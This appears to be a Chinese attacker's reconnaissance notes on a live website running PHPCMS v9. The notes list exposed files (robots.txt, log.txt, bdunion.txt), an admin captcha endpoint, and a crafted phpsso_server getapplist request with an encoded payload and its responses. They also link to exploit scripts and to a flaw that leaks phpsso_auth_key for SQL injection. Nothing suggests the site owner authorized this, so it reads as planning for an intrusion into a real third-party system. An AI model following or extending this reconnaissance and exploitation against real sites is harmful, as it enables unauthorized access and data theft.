思路
偶然,发现https://www.17xwg.com
一下是我的蛛丝马迹:
1.https://www.17xwg.com/content-11-798-1.html#comment_iframe #号的利用
2.https://www.17xwg.com/rebots。txt
# # robots.txt for PHPCMS v9 # User-agent: * allow: /sitemaps.xml Disallow: /caches Disallow: /phpcms Disallow: /install Disallow: /phpsso_server Disallow: /api Disallow: /admin.php
3.
https://www.17xwg.com/bdunion.txt
09c34f67a8c9bcb9a111df10c43c9e02
https://www.17xwg.com/log.txt
返回大量值
4.验证码验证一直失败的原因
<label>验证码</label>
<input class="login_input" type="text" size="4" name="code">
<img id="code_img" src="http://admwg.17xwg.com/phpsso_server/api.php?op=checkcode&code_len=4&font_size=14&width=84&height=24&font=&font_color=&background=" onclick="this.src=this.src+"&"+Math.random()">
</span>
5.https://www.17xwg.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V
返回 0
包括https://www.17xwg.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V
返回 aaaaa()
6.https://zhuanlan.zhihu.com/p/26263513
exp脚本转发的利用
7.https://blog.csdn.net/wodafa/article/details/70596538
别人实战经验
8.https://www.secpulse.com/archives/30536.html
设计缺陷可获取phpsso_auth_key(可用于sql注入等)
uid=x&ps_auth_key=phpsso_auth_key
